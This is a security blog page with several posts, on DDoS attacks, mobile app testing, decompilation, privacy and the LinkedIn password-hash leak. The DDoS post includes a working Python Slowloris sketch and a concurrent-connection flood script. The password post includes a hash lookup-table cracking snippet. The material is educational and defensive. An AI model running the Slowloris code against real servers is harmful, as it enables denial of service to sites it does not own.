- Posted by
The recent wave of DDoS attacks on banking web sites, and the
Spamhaus DDoS attack (which was three to five times greater
than the biggest attacks against U.S. banks), reinforce that,
while these attacks aren't particularly sophisticated, they do
warrant our attention. When targeted, the attacks can be extremely
disruptive to online operations. To protect against DDoS attacks,
it's important to understand their root cause.
DDoS attacks take many forms, but at their core they're essentially a
battle of resources. The attackers attempt to exhaust
resources on the server through "reasonably" valid requests. I use
this term loosely because they exploit certain assumptions
that the network or web server makes in order to tie up the maximum
resources per request. After that, it's just a matter of getting
enough additional manpower to do the same thing at once to clog up
the server's resources.
This differs from a
normal DoS (Denial of Service) attack, in which the attacker finds a single
request that can consume massive amounts of resources or take down
the server outright.
One popular mechanism for DDoS attacks is "Slowloris",
a piece of software written by Robert Hansen (RSnake).
Wikipedia does a great job of explaining it as such:
Slowloris tries to keep many connections to the target
web server open and hold them open as long as possible. It
accomplishes this by opening connections to the target web server
and sending a partial request. Periodically, it will send
subsequent HTTP headers, adding to (but never completing) the
request. Affected servers will keep these connections open, filling
their maximum concurrent connection pool, eventually denying
additional connection attempts from clients.
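To make the mechanics concrete, here's a minimal Python sketch of the Slowloris idea, not a reimplementation of RSnake's tool. The host, port, and `X-a` header are placeholders, and this is only for testing servers you own:

```python
import socket
import time

def partial_request(host):
    # A request line and one header, but no terminating blank line
    # (\r\n\r\n), so the request is never complete.
    return f"GET / HTTP/1.1\r\nHost: {host}\r\n".encode()

def keepalive_header(n):
    # Each periodic bogus header keeps the request "in progress".
    return f"X-a: {n}\r\n".encode()

def slow_connection(host, port, headers=100, delay=10):
    # Open a connection, send the partial request, then trickle out
    # one header every `delay` seconds to hold the connection open.
    sock = socket.create_connection((host, port))
    sock.sendall(partial_request(host))
    for n in range(headers):
        time.sleep(delay)
        sock.sendall(keepalive_header(n))
    return sock
```

An attacker simply runs `slow_connection` hundreds of times in parallel until the server's connection pool is full.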
Another popular way to do this is to simply flood the server
with TCP packets: some that say you want to create a connection,
some that say a connection is already in progress, some that say
to close a connection that doesn't exist, and so on. The server is
forced to handle each of these TCP packets and determine how to
deal with them. Similar to the Slowloris attack, the server will
try to hold on to the connection as long as possible if you only
partially open the connection. For most popular web servers, every
connection maps to a process on the server, so if you're quick enough
you can exhaust the process ID space. There's a
tool Anonymous made popular, called the Low Orbit Ion
Cannon, that makes this easy.
Servers are inherently designed to handle a large number of
connections, so it's difficult for one individual to knock over a
server; however, with enough people or a botnet, it can be brought
to its knees. If it takes the attacker the same amount of time and
resources to create and send a request as it takes the server to receive and
process it, then it is truly a battle of who has the most
resources. Taking down something like Amazon or Cloudflare is going
to be nearly impossible.
To help mitigate the risk of DDoS attacks, organizations should
consider moving their servers to an infrastructure that scales -
and scales fast. Amazon allows you to add virtual servers when a
potential DDoS attack is happening; Cloudflare tries to do this in
real time. Cloudflare, ironically, was itself the target of a few DDoS
attacks last year that tried to saturate its network. The
attackers hit throughput of 90Gbps, which is an insane amount of
traffic. At that speed, assuming your computer could keep up, you
could download six full-length high-definition movies in ONE
SECOND, or I could transfer the entire contents of my hard drive in
less than ONE MINUTE. Cloudflare recently wrote a couple of good
blog articles about how they handled the attacks.
Additionally, one of Security Innovation's Principal Security
Engineers, Marcus Hodges, wrote a library for python called BlackMamba, which makes it
easier to write a client to create a huge number of requests for
fast scanning or DDoS attack simulation. Note that it does require a
lot of hardware to conduct this kind of simulation, but this library can
help level the playing field, making it easier for you to write a
very fast, parallel, asynchronous Python script for testing.
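BlackMamba has its own API that I won't reproduce here, but the underlying idea — holding many requests in flight at once instead of issuing them one at a time — can be sketched with nothing but the standard library's asyncio. The local echo server below stands in for a real target so the example is self-contained:

```python
import asyncio

async def handle(reader, writer):
    # Stand-in for a real target: echo the request line back.
    data = await reader.readline()
    writer.write(data)
    await writer.drain()
    writer.close()

async def fire(host, port, i):
    # One client "request": connect, send a line, read the reply.
    reader, writer = await asyncio.open_connection(host, port)
    writer.write(f"request {i}\n".encode())
    await writer.drain()
    reply = await reader.readline()
    writer.close()
    return reply

async def flood(n=100):
    server = await asyncio.start_server(handle, "127.0.0.1", 0)
    port = server.sockets[0].getsockname()[1]
    # gather() keeps all n requests in flight concurrently.
    replies = await asyncio.gather(
        *(fire("127.0.0.1", port, i) for i in range(n)))
    server.close()
    await server.wait_closed()
    return replies

replies = asyncio.run(flood())
print(len(replies))  # 100
```

A single event loop comfortably juggles thousands of concurrent connections this way, which is exactly why one modest client can tie up a server that dedicates a process to each connection.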
Link to this article.
- Posted by
Yesterday was a sad day for NASA, which was forced to halt all
education and public outreach activities, including public
engagement and outreach events, programs, activities and products.
These spending cuts, enacted by Congress through inaction, will
directly affect the education, inspiration, prosperity and
competitiveness of our future generations of the USA (India and
China are both investing heavily in space exploration programs). We
just reduced our investment in space exploration from 1/2 of one
percent of the federal budget.
We need more education and more role models for our kids, like
our astronauts, scientists and educators, and fewer who provide no
improvement to our society, like our "reality" television and silly
celebrities. We need more funding for things that will improve our
society through education and inspiration and fewer things that
will tear it down, like fear and war.
Neil deGrasse Tyson has some powerful words about this; please
watch the video below. It's heart-wrenching and inspirational.
Here is the NASA Internal Memo:
If you want to build a ship, don't drum up people to collect
wood and don't assign them tasks and work, but rather teach them to
long for the endless immensity of the sea.
- Antoine de Saint-Exupery
Link to this article.
- Posted by
I'm happy to say that tonight I'll be publishing JoeCMS as free and
open source software (GPL), as evidenced by the little "Fork me on GitHub"
banner in the upper right corner of this page. JoeCMS runs this
website and a couple of others, and I've been really happy with its
simplicity and feature set. I created JoeCMS after trying to
shoehorn a few of the bigger CMSs into my needs. They were all
complicated, had a ton of dependencies and, most of all, were
confusing for the users of my websites.
If you want to get started with the CMS, head on over to the
GitHub page or just dive into the quickstart guide.
I feel it's really important that I could write the feature set
of JoeCMS down on the back of a napkin. The primary features are,
and will always be:
- A Blog (everybody wants a blog, right?)
- Easy to create other pages (like a CMS)
- Change layout and skin online
That's about it. Sure, there are other supporting features, like
page versioning, Markdown support, the ability to mark pages as
hidden or draft, RSS, and some others, but the big thing is that if
you just want a website, and don't want all the other stuff that
often comes along with a CMS, JoeCMS may just work for you.
If you're a developer and want something to build on, this might
be a good solution for you too. There are some cool features
already done, and there's plenty to build on. Of course if you make
improvements please send a pull request over!
I'm proud to release JoeCMS; any feedback is greatly
appreciated!
Link to this article.
- Posted by
A couple weeks ago I presented a webcast
at Security Innovation that covered techniques for testing mobile
applications. As usual, I was long-winded with stories and analogies
and went over time. I tried to answer as many questions as
possible, but we had to cut the webcast off at ten minutes after
the hour. As I closed out the webcast I mentioned that there were
dozens of great questions that I wanted to answer but didn't have
time for. Just like in the webcast, I have been thorough, if a bit
long-winded. On the plus side, I plan on releasing answers to all
of the questions asked, and we'll release these in a multi-blog
series.
I've copied the questions here and answered them as thoroughly
as possible. I appreciate your questions and strive to be the
fountain of knowledge that you expect, so I hope you'll keep them
coming for my next webcasts!
Zak Dehlawi, Security Innovation's resident Android guru,
answered most of the Android questions, so when you see an answer
about Android, it's his expertise we're tapping into. Thanks Zak!
One small note: I've taken each of these questions verbatim but
dropped the names. The questions are yours, the answers are mine.
Q: What do you think about SDLC? Do tools exist to do
this?
A: I think integrating security into each phase of the SDLC
(Software Development Lifecycle) is a huge step toward creating
secure applications. Getting the security conversation started
early and continuing it often is very important.
The Microsoft SDL (Secure Development Lifecycle also called the
SSDLC or Secure Software Development Lifecycle) and many others
define security "gates" between the phases of development, which
are also very helpful. You can think of these gates as checks and
balances between each phase. They help the business people talk to
their end users about security, help get those requests into
requirements and then translate those requirements into secure
specifications by the architect. At each transition there is a
process in place to make sure things are done properly and
effectively. A gate for developers might be something like a
security code review before check-in; for testers it might be a
security test pass before sprint sign-off.
The SDLC is more of a process, so it doesn't particularly lend
itself to a single tool. However, Microsoft has released SDL
templates for both Agile and waterfall processes that snap into
VSTS and TFS. They've also released the Microsoft Threat Modeling
Tool, which can help kick your SDL off to a great start.
While you can use the MS SDL even if you're not a Microsoft shop,
you may be looking for other standards. If you're interested in
those, I'd suggest checking out OpenSAMM (Open Software
Assurance Maturity Model), an OWASP subproject.
OpenSAMM does a great job of defining gates inside and outside of
the actual coding phases, touching on the Governance,
Construction, Verification and Deployment phases. It's nice and
lightweight and covers a great deal of touch points for development.
If you're still looking for something else, check out CLASP
(Comprehensive, Lightweight Application Security Process).
Security Innovation offers SDLC Gap analysis as a service, which
is why I know so much about each of these things. When we perform a
Gap Analysis process for our customers we first look at their
current process, then discuss their goals for security. Once we
understand where they are and where they want to be we will help
create a roadmap using many of the principles in the MS SDL, the
CLASP and the OpenSAMM processes to custom tailor a solution that
matches our client better than any other standard could. We then
help highlight different security gates through internal and
external process, education, tooling and standards to make sure the
process is followed properly. The gap analysis can take quite some
time as our clients become more mature in their process, so we
build in touch points over months or years with our customers as
they implement their secure process throughout.
If you have any further questions please contact me!
Q: Is buffer overflow possible for Android
applications?
A: Buffer overflow vulnerabilities in the classic sense are not
possible in managed code. Android apps are written in Java and
executed by the Dalvik Virtual Machine, which performs array bounds
checking; any attempt to exceed the array bounds results in an
ArrayIndexOutOfBoundsException. However, as the Android OS is based
on Linux, a number of low-level programs written in C/C++,
including the VM itself, could be vulnerable to buffer overflow
attacks.
These classic vulnerabilities can be found in a number of
places, and aren't always patched as wireless carriers drop support
for their phones. In fact, rooting your Android phone usually
involves either a buffer overflow attack or a resource exhaustion
attack, depending on the phone and OS version. Newer versions of the
Android OS have taken steps to mitigate these threats using Address
Space Layout Randomization (ASLR) and hardware based No Execute
(NX) to prevent code execution on the stack and heap.
Q: You mentioned that applications should check
certificate components. How can we modify certificate parameters for
testing?
A: During the talk I mentioned that every certificate should be
validated on the device as much as possible. Depending on your
needs for flexibility and security, you may choose to validate the
certificate using the certificate's attributes and the certificate
chain of trust up to the CA root. If you are certain the
certificate will not change, then you can also hardcode the
fingerprint of the certificate into the application. This reduces
flexibility, because if the certificate ever has to change for any
reason you'll have to send out an update to your application. On
the other hand, it can help if you're concerned with Certificate
Authorities getting hacked and an attacker generating fraudulent
certificates.
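Here's a minimal sketch of that fingerprint-pinning check in Python, assuming the app has the server certificate's DER bytes in hand. `EXPECTED_FINGERPRINT` is a made-up placeholder; in a real app it would be the SHA-256 fingerprint of your server's actual certificate, baked into the binary:

```python
import hashlib
import hmac

# Hypothetical pinned value (all zeros as a placeholder).
EXPECTED_FINGERPRINT = "00" * 32

def fingerprint(der_bytes):
    # Fingerprint = hash of the certificate in DER form.
    return hashlib.sha256(der_bytes).hexdigest()

def pin_matches(der_bytes, expected=EXPECTED_FINGERPRINT):
    # compare_digest avoids leaking how many characters matched.
    return hmac.compare_digest(fingerprint(der_bytes), expected)
```

The app refuses the connection unless `pin_matches` returns True, regardless of what the device's CA store says.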
When we test the certificate checking on the device, we will
first attempt to redirect traffic through Burp without generating
our own certificate. This tests the classic Man-in-the-Middle
attack, since the PortSwigger CA is not trusted on the device by
default. This should fail every time. If it doesn't, that means the
application isn't checking the certificate's CA chain, or may only
be checking that it is communicating over SSL and not checking the
certificate at all.
If it passes that test, then we install the PortSwigger CA on the
device and try again. If this works, then we know the application
does not have the fingerprint of the cert hardcoded and is
trusting the CA store on the device. If this doesn't work, then we
have a bit more work to do and will investigate why the cert is
being rejected.
Next we will modify the certificate's attributes one by one.
Will the app accept a certificate that is expired? What about one
that is not yet valid? What about one that doesn't match the
common name? We will invalidate each attribute and check how the
application responds.
Q: How many Security Departments are using Burp to
test?
A: Many! There are other HTTP proxies out there (WebScarab,
Paros, Fiddler, etc.) that are all good, for different values of
good, but Burp seems to be the industry standard. Burp is
relatively inexpensive, easy to use and full featured. Sometimes
we've found it falls short for some high volume or very complex
tests, but it does a good enough job that I use it whenever I use a
proxy. For those highly complex or high-volume tests we usually
develop our own tools in Python. For the high-volume tests we love
using one of our Principal Security Engineers' asynchronous Python
library, Black Mamba; thanks Marcus!
Q: great presentation!
A: Thanks! Tune in next time!
Link to this article.
- Posted by
In November of last year Engadget ran a story explaining how
easy it is to decompile Windows Phone 7 applications. A lot of
developers were surprised that their
apps could be reverse-engineered and decompiled, and that attackers
could easily browse the source of their applications. The attack
goes something like this: download ILSpy for free, sync
your Windows Phone 7 or download a Windows Phone 7 app to your
computer, open the app in the decompiler, right click and select
"decompile." Once the application has been decompiled, the tool
displays the application's source in the main window. There's even
an option to export the source as a Visual Studio project. This
makes it easy to understand the algorithms used for key management,
licensing, or that sweet graphics engine they've developed. You can
leverage the same attack on Jar or Silverlight files you download
off the Internet, or any other application written in a language
that is compiled to some kind of IL or byte-code.
Before you start polishing off your copy of "The C Programming
Language" and decree that everything must be compiled to the bare
metal, or decide you'll write your own obfuscated assembly… by
hand… consider your options and the benefits jumping through all
these hoops will get you.
The common reactions to decompilation attacks are:
- Write it in a native language
- Obfuscate the binary
- Design with openness in mind
I'll be talking about each of these in depth in this blog, but
here's a preview:
Native languages such as C/C++ are compiled to machine code,
which can be executed by the processor directly, without an
interpreter; however, these can be decompiled too, and there are
some amazing tools out there to help with this. Obfuscation can
raise the bar, but if the reward is great enough the attacker will
break the obfuscation; worse, the obfuscation may simply frustrate
your attacker, training them with laser-like focus on your app.
Understanding the threats early and designing with openness and
security in mind can help you move many of the threats off the
untrusted mobile device.
<disclaimer>I'm not a lawyer, so I'll stick to the
stuff I do know: application security. But if you're really
concerned about Intellectual Property and somebody stealing your
ideas, I'd suggest you read up on patent law and some of the laws
around "prior art."</disclaimer>
Mobile Devices are simply another class of client. Developers
have been programming client applications since two computers were
networked together. One lesson we keep learning is don't trust
the client. Don't trust it for input validation, don't trust
it to create your SQL queries, don't trust it for authentication or
authorization, and don't trust it for anything that matters.
Clients have come in all kinds of different flavors over the years.
The web is the client-server paradigm that rules today, but 10
years ago the client-server model was custom: everything had a
client we had to download and a port we had to open to enable the
functionality of the software. Neither of these models is
inherently more secure than the other.
Most of the apps I've seen on mobile devices do a great job of
letting me access data that is already in the cloud, mashing up two
or more sources of data for my mobile browsing pleasure, or
performing the bulk of the processing on the server due to processing
or data storage limitations on the handheld. If your app falls into
any of these categories, you've got little to worry about. Most of
the neat stuff your app does is not on the device! Just keep
innovating and you'll stay consistently ahead.
Here are some examples of apps I used often:
- OneBusAway - Mashup/Server Processing
- Twitter - Cloud
- Yelp - Cloud
So what if your app really needs to protect something? Two apps
on my device immediately come to mind and fall into that category:
Rhapsody and Kindle. Both of these applications protect data using
Digital Rights Management (DRM) so protecting keys is … well, key.
We'll talk more about encryption and key management options
later.
Let's talk about options:
Write it in a native language
One of the first things to come up in early discussions about
securing a client app is to write it in a language that will
compile into Machine Code. Machine Code is the lowest level
language in which to give instructions to the processor itself. It
is highly hardware-dependent, making portability difficult, and it
increases the risk of other security vulnerabilities such as buffer
overflows, format string vulnerabilities and other memory
management issues. Most of these issues are far worse than
information disclosure or decompilation attacks could ever be; they
likely allow for arbitrary code execution on the remote device.
Native code is more difficult to decompile, true, but with tools
like IDA Pro it's
possible to disassemble native applications and sometimes possible
to reverse the binary back to readable C source code. Writing your
application in a native language can help obfuscate the
original code and make it more difficult for an attacker to
understand what the application is doing; however, the risks
inherited by native code don't outweigh the protections provided by
modern managed languages like C# and Java.
Choosing a Native language over a managed language for security
purposes is like locking yourself in the Lion's cage at the zoo
because you're afraid of the mice.
Obfuscation
Microsoft's official stance on releasing .NET applications is to
obfuscate your application before release. Specifically, regarding
PreEmptive Solutions' Dotfuscator, Microsoft says the following on
their website: "any .NET program where the source code is not
bundled with the application should be protected with Dotfuscator."
Obfuscating an application attempts to make reverse engineering
and decompilation more difficult. These techniques range from
producing difficult-to-read code after a decompile to frustrating a
focused attacker enough for them to wage a personal vendetta
against your application and code, vowing to untangle the mess of
obfuscated code if it takes dozens of Red Bulls and weeks of
sleepless nights.
Basic obfuscation techniques include renaming methods,
parameters and variables to short or meaningless strings.
Advanced obfuscation techniques attempt to actively exploit the
techniques decompilers use to get back to the original source.
When asked about obfuscation at conferences or in classes I
usually respond the same way: It can't hurt. Obfuscating your code
will raise the bar for who can decompile your code and reduce the
likelihood of an attacker being able to quickly and easily Trojan
your binaries. However, like most things, as a single line of
defense it is far from sufficient.
Design with Openness in Mind
Of course this entire blog has been one big lead-up to what I
really wanted to talk about: the security principle of Designing
with Openness in Mind. If we assume our attackers have access to
our source (and comments), bug tracking system, design documents
and architecture diagrams and we can still look each other in the
eye and say "this is a secure system" then we've gone a long way on
the path to complete security.
All cryptographic solutions are designed with this in mind. If you
want to, you can learn how AES, one of the most popular and secure
algorithms in the world, works.
Heck, there are even stick-figure cartoons to help you
understand. At the end of the day, understanding exactly how AES
works will not help you break the encryption; in fact, understanding
it will help you make better decisions about how to use it
properly.
We're not all building crypto libraries, of course, but we can
apply this same principle to our code. By making the above
assumptions we're covering all our bases and making sure there
aren't any "keys to the castle" hidden in source code. By
understanding how easily an attacker can reverse engineer and
decompile our applications, we're less likely to simply hope they
don't find our secrets; we will take steps to make sure they
can't.
openness in mind up front:
Client-Server Authentication: I've seen more
than a few applications that need to authenticate a client to a
server without user interaction. The naïve way of accomplishing
this task is to simply embed the same set of credentials in each
binary and have the client send these up to the server for
authentication. Of course, if one set of credentials is
compromised, all clients must be updated. The next level is to
allow for some kind of registration phase and give each client
unique credentials. This increases security by limiting the damage
possible if one set of credentials is lost, but it can be very
challenging to protect credentials on the client or while in
transit. Finally, using a valid Public Key Infrastructure can
help you design and build a system without compromising
security, speed or ease of development. Simply generating and
sharing X.509 (SSL) certificates on the server can go a long way
toward building a system that is resilient to tampering and sniffing.
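On the client side, getting the PKI checks right is mostly a matter of not turning them off. A Python sketch under that assumption (`api.example.com` below is a placeholder hostname):

```python
import socket
import ssl

# create_default_context() loads the system CA store and enables both
# certificate-chain validation and hostname checking by default.
context = ssl.create_default_context()
assert context.verify_mode == ssl.CERT_REQUIRED
assert context.check_hostname

def connect(host, port=443):
    # The handshake fails unless the server presents a certificate that
    # chains to a trusted CA and matches `host`.
    sock = socket.create_connection((host, port))
    return context.wrap_socket(sock, server_hostname=host)

# Usage: tls_sock = connect("api.example.com")
```

The common mistake is the opposite of this sketch: setting `verify_mode` to `CERT_NONE` to "make the error go away," which silently gives up the tamper and sniffing resistance described above.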
Plugin Extensibility: What if you want to be
able to extend your application with new plugins? Perhaps you want
these plugins to come from only a trusted source. So you want the
application to be able to validate the source of the DLL. One basic
way of doing this is, as above, to simply embed a super-secret string
in the DLL and then ask the DLL for that secret when it's loaded. If
the secret matches, you're good to go, right? Wrong: it's trivial
to discover that secret and build it into a rogue library. Another
poor solution I've seen is to build a secret algorithm that will
process data in some specific way. For the sake of example, let's
say the secret algorithm is "add 5, divide by 2 and round down."
Now, in order to check the validity of the DLL, I generate a number,
do the calculation myself, send the number to the DLL and check
what it returns. If I generate 7, that means I'm looking for a 6
(floor((7+5)/2) = 6). If they match, we know it's the right DLL,
right? Wrong again: just like the hidden secret above, I can
discover your secret algorithm by decompiling or reverse
engineering your existing DLLs. Worst case, I can just write a pass-
through method that will ask your valid DLLs for the answer! Crypto
to the rescue again: we can sign each of our DLLs and binaries
before we ship. This binds our DLLs to a trusted source
(anybody that has the private signing key) and allows the
application or system to cryptographically validate the DLLs
before loading them.
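To see how little the "secret algorithm" buys you, here it is written out in Python. Any attacker who decompiles the DLL can reproduce `secret_check` verbatim (the names here are mine, for illustration; the real fix, as above, is signing):

```python
import math

def secret_check(challenge):
    # The "secret" algorithm from the example: add 5, divide by 2,
    # round down.
    return math.floor((challenge + 5) / 2)

def validate_plugin(plugin_answer, challenge):
    # The host computes the answer itself and compares. A rogue plugin
    # that has reverse engineered the algorithm (or simply forwards the
    # challenge to a legitimate DLL) passes every time.
    return plugin_answer == secret_check(challenge)

print(secret_check(7))  # 6
```

The whole scheme is two lines of recovered logic, which is why it offers no real protection.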
I don't mean to imply cryptography is the source of all security
solutions; these are simply two common examples that I've seen
cause problems for a lot of our clients. In the long term, thinking
about threats with the assumption that the attacker has access to
your inner workings can make for a significantly more secure
system. Attacks like reverse engineering and decompilation are the
technical side of the greater issue of secret hiding. People love
talking about their work, especially the cunning algorithms they
design; you'd be amazed at what you can hear at a pub, a popular
lunch stop or just by asking.
As you design and architect your application, go through each
component and ask yourself: what data or algorithm needs to be
protected? What is the loose thread holding your
application together that, if discovered by an attacker, could lead
to the ultimate compromise of that application? Once these pieces
have been discovered, decide whether each threat is something you
will mitigate or a risk that you are comfortable accepting
according to your internal policy.
Link to this article.
- Posted by
I read a really well-written article by Daniel J. Solove, a
professor of law at George Washington University, who says we should
stop thinking about privacy in Orwellian terms (nothing to hide)
and start thinking in Kafkaesque terms (if we have enough
information about you, we will be able to find something,
eventually).
I think this is especially pertinent in this new age of
surveillance and data storage. It costs nearly nothing to store
information now, especially for large corporations and governments,
so they have very little incentive to purge surveillance data. We
may not have the technology or time to link multiple disparate
pieces of information together now, but given enough time and data,
a computer program (or a human with enough time on their hands)
could make inferences and assumptions about the nature of someone's
actions or intent.
The other concerning thing is that there's no way to opt out of
this surveillance, unless you want to spend the rest of your life
in a cabin in Montana (and even then, ultra-high-resolution satellite
imagery and radar make surveillance possible). The data is
collected without consent every time we walk down the street or
drive a car: CCTV and license plate surveillance make it possible
to track the path of an individual from home to work, and software
can identify patterns and deviations from patterns, automatically
notifying anybody needed when somebody passes a threshold.
I didn't really mean to go off on a pro-privacy, conspiracy-nut
rant, but it's something that's been on my mind for a while and I'm
not entirely sure how to fix it. Education and awareness are
certainly key components, but it seems like so many people don't
care or allow themselves to be driven by fear that it's difficult
to see a solution sometimes.
Read the article: Why Privacy Matters Even if You Have 'Nothing to
Hide'.
Link to this article.
- Posted by
By now, you've probably heard that LinkedIn's passwords have
allegedly been compromised. I first heard about this from a
Norwegian website earlier today. Here is what we know now:
- LinkedIn has not confirmed the leak and currently doesn't
understand how the hack could have happened, but there is a 271 MB
file of alleged SHA-1 hashes floating around with LinkedIn's name
attached.
- The hash digests are unsalted SHA-1 hashes.
Technical mumbo jumbo is to follow. If you're just worried about
your password, you should simply change it. Don't use any
website that offers to check if your password has been leaked by
having you type your password into their site. These may be
completely legit, but they're probably trying to ride on your fear
and steal your password. You should also change your password on
any other site where you used that password.
If you'd like to see the list of hashes for research purposes
you can download it
here (warning: 171 MB).
This is particularly interesting to me for a number of reasons.
Right now I'm in Sofia, Bulgaria, teaching a room full of developers
secure coding best practices, and just yesterday we talked about
proper handling of passwords and other sensitive data. We walked
through the spectrum of poor password handling practices, from
worst on the left to best on the right.
To understand the risk, let's walk through a quick rundown of
what hashing is and how LinkedIn was storing your passwords. A hash
is a one-way mathematical function that can take any input and map it
to a smaller output (digest). The nice thing about hashing is that
if you use the same input you are guaranteed to get the same output,
or digest. If the input changes, even in the slightest bit, the
digest changes drastically. Another nice thing about hashing is
that the digest doesn't give you any information about the input,
so it is not possible to reverse a hash.
We can use hashing algorithms to make it easier and safer to
store passwords. Instead of storing the plaintext password in the
database (which everybody agrees is bad, right?), we can
store the digest of the password in the database. Then, when you
type in your password, I'll calculate the hash of what you typed
and compare it with what I have on file for you. If they match,
you're in; if they don't, I'll kick you out!
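That whole scheme is a couple of lines of Python (shown with SHA-1 to match the LinkedIn story; keep reading for why that alone isn't enough):

```python
import hashlib

def store(password):
    # What goes in the database: the digest, never the plaintext.
    return hashlib.sha1(password.encode()).hexdigest()

def login(attempt, stored_digest):
    # Hash what the user typed and compare it with what's on file.
    return hashlib.sha1(attempt.encode()).hexdigest() == stored_digest

on_file = store("password")
print(on_file)                      # 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
print(login("password", on_file))   # True
print(login("passwore", on_file))   # False
```

Note that the one-character change from "password" to "passwore" produces a completely different digest, which is the avalanche property described above.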
There are multiple ways, or algorithms, to "hash" text; some are
better than others, and only "cryptographic" hash functions should
be used for anything security related, so I'll only talk about
those here. Again, we have a spectrum from worst to best (hint: if
you're thinking about using a hashing algorithm that isn't on this
list... don't):
MD5 <-> SHA-1 <-> SHA-224/256 <-> SHA-384/512
The first two are broken and should not be used. Note that LinkedIn
used one of the broken ones.
Hopefully, as you're reading this, you're thinking: "Joe! You said
earlier that if given only the output of a hash you can't get back
to the original text, so if LinkedIn was only storing the hash
digest of my password I should be safe, right!?"
Ah, true! However, that assumes I attack the hashes by trying
to break the hash algorithm directly. I've got a few quick
computers and a bit of time. I also know a bit about how people
choose passwords, and how bad they are at it. So instead of trying
to break the hashing algorithm, I'm going to simply get a list of
every password I can get my hands on and calculate the output for
each one. I'll keep track of the password on the left and the
output I generate on the right. Then I'll simply look up each
digest from the leaked list in the massive table I just generated
and read the passwords from there.
This type of attack is called a lookup table. A more efficient
version that is slightly more difficult to explain is the Rainbow Table
attack, and it theoretically will work for any password, though it can
take a lot of work for really long and/or really random passwords
because there are so many combinations. This is why I mentioned
I'll just calculate the digests for the top passwords I already
know about. That way I don't have to do an exhaustive search.
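The precompute-and-lookup attack above is almost embarrassingly simple to sketch. A toy version in Python, with a made-up four-entry wordlist standing in for the millions of leaked passwords a real attacker would use:

```python
import hashlib

# Precompute digests for a list of common passwords (a toy wordlist).
wordlist = ["123456", "password", "qwerty", "LvBieber"]
lookup = {hashlib.sha256(p.encode()).hexdigest(): p for p in wordlist}

# A leaked, unsalted digest is now reversed with a dictionary lookup,
# no "breaking" of the hash algorithm required.
leaked = hashlib.sha256(b"LvBieber").hexdigest()
print(lookup.get(leaked))  # prints LvBieber
```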
OK, so now maybe you're getting nervous, because your password
of LvBieber isn't looking so great right now.
Since you used upper and lower case letters there are 52
possibilities in each of the 8 positions above. That means there are
52^8, or 53,459,728,531,456, combinations. "Wow," you think,
"that's a lot of combinations!" Slow down there, tiger. On my,
mostly, regular computer I can calculate about 680 million
possibilities per second. I can crack your password (and all the
other 53 trillion passwords) in about 22 hours (before lunch, if I
get a few friends to help).
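The arithmetic above, checked in Python (the 680 million guesses per second figure is the one claimed in the paragraph, not a benchmark of mine):

```python
# Back-of-the-envelope math for the 8-character, letters-only password.
combinations = 52 ** 8   # upper + lower case letters, 8 positions
rate = 680_000_000       # guesses per second on one machine (claimed above)

hours = combinations / rate / 3600
print(combinations)      # 53459728531456
print(round(hours, 1))   # 21.8, i.e. roughly 22 hours
```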
What could LinkedIn have done to protect you from your own poor
password choice? Well, they could have required a Password Policy,
but everybody seems to hate those. They could have also added Salt. No, not
that salt, this Salt.
In software we call a chunk of random data that we add to
passwords "salt." Since your password is so easily guessable, it
likely already exists in somebody's rainbow table, so the lookup
would be really quick and easy. We want to make them work for it.
So for each user I generate, say, 10 extra random characters to add
to that user's password. This means I generate some random characters,
"7%bKeVm!fN", and add them to your password, turning it into
LvBieber7%bKeVm!fN. If I do this for every user, the
attacker has to generate a rainbow table for each user independently.
I do have to store the salt in plaintext alongside your password
hash, since I have to use it to regenerate your digest to validate
your password. Well, that's better than plaintext or just plain
hashing, right? I bet we can do better though, right? Of course we can.
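Salting can be sketched like this in Python (the helper names and the 16-byte salt length are my own choices; note the salt is stored in the clear right next to the digest, exactly as described above):

```python
import hashlib
import os

def hash_with_salt(password: str):
    # A fresh random salt per user, stored in plaintext next to the digest.
    salt = os.urandom(16).hex()
    digest = hashlib.sha256((password + salt).encode()).hexdigest()
    return salt, digest

def verify(attempt: str, salt: str, digest: str) -> bool:
    # Re-apply the stored salt to the attempt and compare digests.
    return hashlib.sha256((attempt + salt).encode()).hexdigest() == digest

salt, digest = hash_with_salt("LvBieber")
print(verify("LvBieber", salt, digest))  # correct password verifies
```

Because each user gets a different salt, two users with the same password end up with different digests, which is what forces the attacker to rebuild their table per user.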
There are a few key
derivation algorithms, PBKDF2, scrypt, and bcrypt, that add an
element of "work" to calculating a digest. The idea is that it's
not such a big deal for a website to spend half a second
calculating your password digest each time you login, but if an
attacker can only calculate two passwords per second that makes any
rainbow table attack infeasible. PBKDF2 does this by hashing the
output of the previous digest thousands of times, bcrypt and scrypt
use some fancy cryptography to do this a bit more elegantly, but
the result is about the same. Both bcrypt and PBKDF2 have been well
implemented in many languages.
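PBKDF2, for instance, is available in the Python standard library as `hashlib.pbkdf2_hmac`. A minimal sketch (the iteration count here is an illustrative value; in practice you tune it so one digest takes a noticeable fraction of a second on your hardware):

```python
import hashlib
import os

salt = os.urandom(16)
iterations = 100_000  # the "work" knob: higher is slower for you AND the attacker

# Derive the stored digest from the password, salt, and iteration count.
digest = hashlib.pbkdf2_hmac("sha256", b"LvBieber", salt, iterations)

# Verification repeats the same work with the stored salt and count.
attempt = hashlib.pbkdf2_hmac("sha256", b"LvBieber", salt, iterations)
print(attempt == digest)  # True for the correct password
```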
One thing to note. Don't ever try to
implement your own cryptographic solutions. Never, ever, ever,
ever, should you attempt this. Cryptographers are smarter than you
and me and everybody I know put together. They spend all day
thinking about these things, and even then it takes a team years to
create a new secure algorithm, which is then peer reviewed and proven
to be secure. It does not happen with a clever insight after four
cups of coffee and an espresso.
Edit: A few comments and edits that my friends
at Reddit have pointed out. I suppose this turned into a bit more
of a technical article than I was originally intending, so I may
have skipped over a couple of things that I would have otherwise
covered.
- I should have mentioned explicitly that everything but PBKDF2,
bcrypt, and scrypt should be considered bad practice. Encoding is
no better than plaintext, at all. Encoding does not use keys and
does not provide security.
- When I say encrypted, I mean that you are trying to encrypt the
password such that it can be decrypted later, which is a bad
practice. We want a one-way function such that no data can ever be
recovered. Keys can be compromised, and there is no benefit to
using a reversible algorithm for passwords; it just increases your
risk.
- The reason why I consider encrypting a little bit
better than hashing is the massive popularity of rainbow tables and
hash databases available on the
internet. Poor passwords don't stand a chance against these if
salt isn't used.
- I didn't (and don't) want to get into the specifics of how
PBKDF2, bcrypt and scrypt work, but they all increase the amount of
"work" a computer has to do to create the same hash digest. This
slows you you when verifying a user's password, but also slows the
attacker down from generating their tables which is good! Work can
be introduced purely by CPU usage, or in the case of scrypt memory
usage as well.
- All hashing algorithms will fail. Full stop. Currently, if you
